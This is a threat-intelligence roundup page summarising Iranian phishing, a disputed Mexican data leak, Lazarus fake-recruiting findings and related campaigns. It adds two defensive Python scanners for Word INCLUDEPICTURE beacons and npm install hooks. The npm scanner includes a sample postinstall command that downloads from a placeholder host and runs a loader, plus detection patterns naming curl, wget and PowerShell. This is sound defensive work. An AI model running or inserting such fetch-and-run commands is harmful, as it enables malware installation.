Multiple Unrelated Cybersecurity Reports: Iranian Spear-Phishing, Alleged Mexican Government Data Leak, and Lazarus ‘Contagious Interview’ Findings

Tags: phishing-campaign-intelligence, credential-stealer-activity, state-sponsored-espionage, remote-access-implant, mass-credential-exposure
Updated March 21, 2026 at 02:38 PM (3 sources)

The provided items do not describe a single cohesive cybersecurity event; they cover separate incidents and research. Dark Reading reported an Iran-linked credential theft and surveillance effort targeting people of interest abroad (including Iranian expats and regional targets) using spear-phishing and social engineering, including lures delivered via WhatsApp and phishing infrastructure that was rapidly stood up and taken down as campaigns shifted targets.

Separately, Dark Reading covered allegations that the Chronus Group leaked 2.3TB of data purportedly sourced from 25+ Mexican government institutions, claiming exposure affecting 36 million people; Mexico’s ATDT disputed that it represented a new breach, stating it appeared to be aggregated data from prior incidents and that impacted systems were largely obsolete, third-party administered state-level platforms. In parallel, Red Asgard published new technical findings on the Lazarus-linked “Contagious Interview” activity targeting developers/freelancers via fake recruiting, reporting recovery of 241,764 plaintext credentials from unauthenticated endpoints, identification of an AnyDesk-based RAT with persistent remote access and hardcoded attacker credentials, and additional detection content (e.g., YARA and Snort rules).

Timeline

  1. Feb 5, 2026

    Researchers expose credential database in Iranian-linked phishing infrastructure

    Analysis of the phishing infrastructure uncovered a path traversal flaw that exposed a database containing hundreds of stolen credentials and two-factor authentication codes. The same infrastructure also served fake Gmail login pages and phone-number collection pages.

  2. Feb 5, 2026

    Second wave adds Telegram and X impersonation lures

    A follow-on wave of the same espionage campaign expanded to new social-engineering themes, including a fake Telegram bot threatening account deletion and an X impersonation of activist Fatema Al Harbi sending fake Google Meet invitations for credential theft. Researchers noted the infrastructure appeared to support both espionage and cybercrime use cases.

  3. Feb 5, 2026

    Iran-linked phishing campaign targets expatriates and activists

    A highly targeted spear-phishing campaign attributed with varying confidence to Iranian-linked operators began targeting people of interest outside Iran, including expatriates, Syrians, and Israelis. Early lures used WhatsApp-themed messages and DuckDNS-hosted credential-harvesting pages to steal logins and attempt account takeovers.

  4. Feb 4, 2026

    Mexico's ATDT disputes breach scale and begins containment actions

    Mexico's Agencia de Transformación Digital y Telecomunicaciones said its analysis indicated the dataset was largely an aggregation of information from prior breaches and that no sensitive data publication had been identified. The agency was described as taking initial containment steps such as revoking credentials and supporting remediation.

  5. Feb 4, 2026

    Chronus Group claims 2.3TB leak from Mexican government institutions

    A hacktivist collective calling itself Chronus Group claimed to have leaked 2.3TB of data allegedly affecting 36 million Mexicans and sourced from at least 25 government institutions. The purportedly exposed information included names, phone numbers, addresses, dates of birth, and IMSS Bienestar registration data.

  6. Feb 3, 2026

    Red Asgard publishes detections and reports findings to authorities

    Following its investigation, Red Asgard released community detections including 16 YARA rules and 88 Snort rules. The firm also reported the incident to the FBI's IC3 and later to CISA.

  7. Feb 3, 2026

    Red Asgard identifies AnyDesk RAT and backend flaws in campaign infrastructure

    Researchers identified a fourth malware family, a custom AnyDesk RAT that silently installs and configures AnyDesk for persistent attacker access. They also mapped the backend infrastructure, found an IDOR flaw in the /allinfo endpoint, enumerated operator accounts, and decrypted a custom XOR-based protocol used for beacon scheduling.

  8. Feb 3, 2026

    Red Asgard confirms Lazarus-linked C2 is live and leaking victim data

    In its continued investigation of the 'Contagious Interview' campaign, Red Asgard determined the command-and-control infrastructure was operational rather than a honeypot. Researchers retrieved 241,764 plaintext credentials tied to 857 victims across 90 countries from unauthenticated HTTP endpoints.


Related Stories

Mixed threat reporting: APT campaigns, malware delivery via compromised web assets, and ransomware exploitation

The provided items do not describe a single cohesive cybersecurity event; they span multiple unrelated threat reports and opinion pieces. Notable incident-level reporting includes **APT28** activity in Western/Central Europe (“Operation MacroMaze”) using spear-phishing lures with Office macros that beacon via `INCLUDEPICTURE` to `webhook[.]site` and then execute VBScript/CMD/batch stages for persistence and follow-on payload delivery. Separately, **MuddyWater** (Iran/MOIS-linked) was reported running “Operation Olalampo” against organizations in the Middle East and Africa, delivering new custom malware (including a **Char** backdoor using a **Telegram bot** for C2) and, in some cases, attempting exploitation of public-facing servers in addition to phishing. Criminal activity and initial-access tradecraft were also covered across distinct stories: a DFIR case study described exploitation of **Apache ActiveMQ** `CVE-2023-46604` to gain RCE, conduct post-exploitation (Metasploit/Meterpreter, privilege escalation, LSASS access, lateral movement), and ultimately deploy **LockBit**-branded ransomware via RDP using previously stolen credentials (with indications the payload was built using the leaked builder and used *Session* for communications). Multiple reports described malware delivery via compromised web assets and social engineering, including **GrayCharlie** injecting malicious JavaScript into WordPress sites to push **NetSupport RAT**, **Stealc**, and **SectopRAT** via fake updates/ClickFix-style CAPTCHAs, and a separate **ClickFix** campaign delivering a custom C++ RAT (**MIMICRAT**) through fake Cloudflare verification prompts that trick users into running PowerShell. 
Additional, unrelated threat reporting included a **NuGet** supply-chain attack (typosquatted `NCryptYo` plus companion packages) targeting ASP.NET Identity data and enabling backdoored authorization rules, and malicious Chrome extensions using a “**Promise Bomb**” browser-crash technique to drive users to run fake “CrashFix” PowerShell steps. Several other items were generic commentary/roundups (data breach trends, quantum preparedness, Enigma history, NATO public opinion polling, recon how-to, and a malware-newsletter link list) and do not add event-specific intelligence.

1 month ago
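The Operation MacroMaze item above describes lure documents whose `INCLUDEPICTURE` field beacons to an external URL when the document is opened. The following scanner is an added example, not code from this page or from any of the cited reports: it opens a `.docx` as a zip, joins the field-code runs in each paragraph (Word splits a field across several `w:instrText` elements) and reports any `INCLUDEPICTURE` that points at a remote URL. The sample document and its callback hostname are constructed placeholders.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# A field code is spread across one or more <w:instrText> runs, so we join
# them per paragraph before matching INCLUDEPICTURE with a remote URL.
FIELD_RE = re.compile(r'INCLUDEPICTURE\s+"?(https?://[^"\s]+)', re.IGNORECASE)


def find_remote_includepicture(docx_bytes: bytes) -> list[str]:
    """Return the external URLs referenced by INCLUDEPICTURE fields in a .docx."""
    urls = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        # Fields may sit in the body, headers or footers: inspect every word/*.xml part.
        parts = [n for n in zf.namelist() if n.startswith("word/") and n.endswith(".xml")]
        for name in parts:
            root = ET.fromstring(zf.read(name))
            for para in root.iter(f"{{{W_NS}}}p"):
                instr = "".join(t.text or "" for t in para.iter(f"{{{W_NS}}}instrText"))
                urls += FIELD_RE.findall(instr)
    return urls


def build_sample_docx(target: str) -> bytes:
    """Constructed sample (not a real lure): minimal document.xml with a split field code."""
    doc = f'''<?xml version="1.0" encoding="UTF-8"?>
<w:document xmlns:w="{W_NS}"><w:body><w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE </w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">"{target}" \\d</w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:body></w:document>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", doc)
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder callback host; a real hunt would compare hits against a watchlist.
    sample = build_sample_docx("https://webhook.example.invalid/beacon.png")
    print(find_remote_includepicture(sample))
```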
Weekly threat intelligence roundup covering breaches, ransomware, and emerging AI-enabled tradecraft

Reporting during the week of Feb. 23 highlighted multiple unrelated security incidents and research findings rather than a single cohesive event. **France’s Ministry of Economy** disclosed unauthorized access to the national bank account registry **FICOBA**, exposing data tied to **~1.2 million accounts** (e.g., names, addresses, account identifiers, and in some cases tax-related identifiers), with officials attributing access to **compromised government credentials**. Separately, **Advantest** reported a **ransomware** intrusion following third-party unauthorized access, **University of Mississippi Medical Center** experienced a ransomware event that disrupted clinics and electronic medical records, and **Ukraine’s National Bank** reported a **supply-chain** exposure at a contractor supporting its collectible coin online store (customer registration data exposed; payment data reportedly unaffected). In Taiwan, **Taipei Grand Hotel** said a third party accessed internal systems without authorization during the Lunar New Year period; the hotel took networks offline for forensics and warned customers to be cautious of suspicious messages. Threat-actor and technique reporting also described ongoing campaigns and emerging tradecraft. **MuddyWater** (Iran-aligned) was reported targeting **MENA** organizations in “Operation Olalampo,” using phishing lures with malicious Office documents/macros to deploy tooling including **GhostFetch**, **HTTP_VIP**, a Rust backdoor **CHAR**, and an implant dubbed **GhostBackDoor**, with one chain also deploying *AnyDesk* for remote access. Separately, reporting on **DPRK-linked** crypto operations described sustained, social-engineering-led targeting of the crypto ecosystem following the **Bybit** theft, including AI-assisted persona and communication crafting and laundering via mixing/OTC pathways. 
Additional research noted internet-wide scanning telemetry involving **OAST/Interactsh** callback domains and shifts toward cookie-based injection, while another item profiled PRC-attributed **Lotus Blossom** as an espionage actor (including discussion of the *Notepad++* ecosystem incident) and a separate post provided general reconnaissance methodology rather than incident-specific intelligence.

1 month ago
Multi-stage phishing and supply-chain malware campaigns targeting credentials and long-term access

Multiple reports highlight active campaigns using *phishing* and *software supply-chain abuse* to steal credentials and establish persistence. eSentire described an espionage-focused operation targeting residents of India with emails impersonating the Income Tax Department, leading victims to a malicious archive that uses DLL side-loading with a legitimate signed Microsoft application, extensive anti-analysis checks, in-memory shellcode unpacking, UAC bypass, and process masquerading; the payload was identified as a **Blackmoon**-family variant that specifically attempts to disable **Avast Free Antivirus** by automating UI interactions to add exclusions. Separately, Aikido reported a malicious npm package (`ansi-universal-ui`) that deploys a multi-stage infostealer (“**G_Wagon**”) by abusing `postinstall` execution, downloading a Python runtime, running an obfuscated payload, and exfiltrating browser credentials, cloud credentials, Discord tokens, and data from 100+ cryptocurrency wallets to an Appwrite storage bucket; it also includes a Windows DLL used for browser-process injection via NT native APIs. In parallel, network-edge exploitation remains a key access vector: Risky Business reported a renewed wave of attacks against **Fortinet FortiGate** devices via a vulnerability Fortinet allegedly “patched” in December but which attackers can still exploit, enabling SSO authentication bypass (via crafted SAML), creation of new admin accounts, and theft of device configuration; mitigations include disabling the FortiCloud SSO feature (not enabled by default). 
Several other items are general awareness or roundup content rather than specific incident reporting: TechTarget and other blogs emphasized ongoing phishing/email risk (including relay spam abusing legitimate Zendesk instances) and password hygiene, while The Hacker News published a multi-story bulletin that includes (among other items) a spear-phishing campaign in Afghanistan delivering a FALSECUB backdoor via a GitHub-hosted ISO and LNK execution chain; Risky Business also covered Iran’s internet blackout and Starlink jamming/spoofing as a communications-control issue rather than an enterprise cyber incident.

1 month ago
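The npm item above hinges on a package running its first stage from an install-time lifecycle hook (`postinstall`), which executes without any action by the developer. The auditor below is an added example, not code from this page, from Aikido, or from the named package: it reads a `package.json`, keeps only the hooks npm runs automatically during install, and flags commands that fetch remote content, spawn a second interpreter, evaluate inline JavaScript or decode an encoded blob. Both sample manifests are constructed.

```python
import json
import re

# Lifecycle hooks npm runs on its own during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Behaviours a reviewer would want explained before trusting an install script.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I), "downloads remote content"),
    (re.compile(r"\b(python3?|powershell|pwsh|cmd(\.exe)?)\b", re.I), "launches another interpreter"),
    (re.compile(r"\bnode\s+(-e|--eval)\b"), "evaluates inline JavaScript"),
    (re.compile(r"\b(base64|atob\()", re.I), "decodes an encoded blob"),
]


def audit_install_scripts(package_json: str) -> list[dict]:
    """Return one finding per install-time hook whose command matches a pattern."""
    pkg = json.loads(package_json)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in INSTALL_HOOKS:
            continue  # build/test scripts only run when invoked explicitly
        reasons = [why for rx, why in SUSPICIOUS if rx.search(cmd)]
        if reasons:
            findings.append({"package": pkg.get("name"), "hook": hook,
                             "command": cmd, "reasons": reasons})
    return findings


# Constructed manifest mirroring the pattern described: postinstall pulls a
# Python runtime from a placeholder host and runs a downloaded loader.
SAMPLE_MALICIOUS = json.dumps({
    "name": "example-ui-lib",
    "version": "1.0.0",
    "scripts": {
        "postinstall": "node setup.js && curl -sL https://example.invalid/py.zip -o py.zip && python loader.py",
        "test": "jest",
    },
})

# Constructed benign manifest: a native-addon rebuild is a normal postinstall.
SAMPLE_BENIGN = json.dumps({"name": "clean-lib", "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"}})

if __name__ == "__main__":
    for manifest in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        print(audit_install_scripts(manifest))
```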
